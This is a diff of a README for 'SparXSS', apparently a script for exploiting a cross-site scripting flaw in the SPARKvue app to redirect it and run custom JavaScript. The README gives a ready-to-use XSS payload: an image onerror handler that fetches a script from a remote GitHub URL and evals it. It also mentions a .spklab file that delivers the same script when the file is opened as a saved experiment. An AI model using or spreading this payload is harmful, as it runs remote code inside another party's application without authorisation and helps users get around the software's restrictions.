amukerd/SparXSS/README.md

-## A JS Script For Redirection And Custom Javascript Execution For The SPARKvue XSS Vulnerability Found By ohonbob
+## A Script For Redirection And Custom Javascript Execution For The SPARKvue XSS Vulnerability Found By ohonbob

 Run it using:
 ```
 <img src=# onerror='fetch("https://raw.githubusercontent.com/Amukerd/SparXSS/main/sparxss.js").then(r=>r.text()).then(c=>eval(c))'>
 ```

-Or Download The SparXSS.spklab File And Select 'Open Saved Experiment' When You Open The App - this might not be fully up to date, so don't rely on it from here
+Or Download The SparXSS.spklab File And Select 'Open Saved Experiment' When You Open The App - Might not always be up to date

 ## ToDo
 - ~~Make Icon's Show up for Every URL~~
 - ~~Make the custom URL's stay when you export the .spklab file~~<br>
   (currently working, may be changed in the future- change the link from /sparxss.js to /Testing/test4.js to use)
-- May add a tabbing feature to the javascript, but this is not a final decision
+- May add a tabbing feature to the javascript, but this is not a final decision as there is not too much of a point

 ## Changelog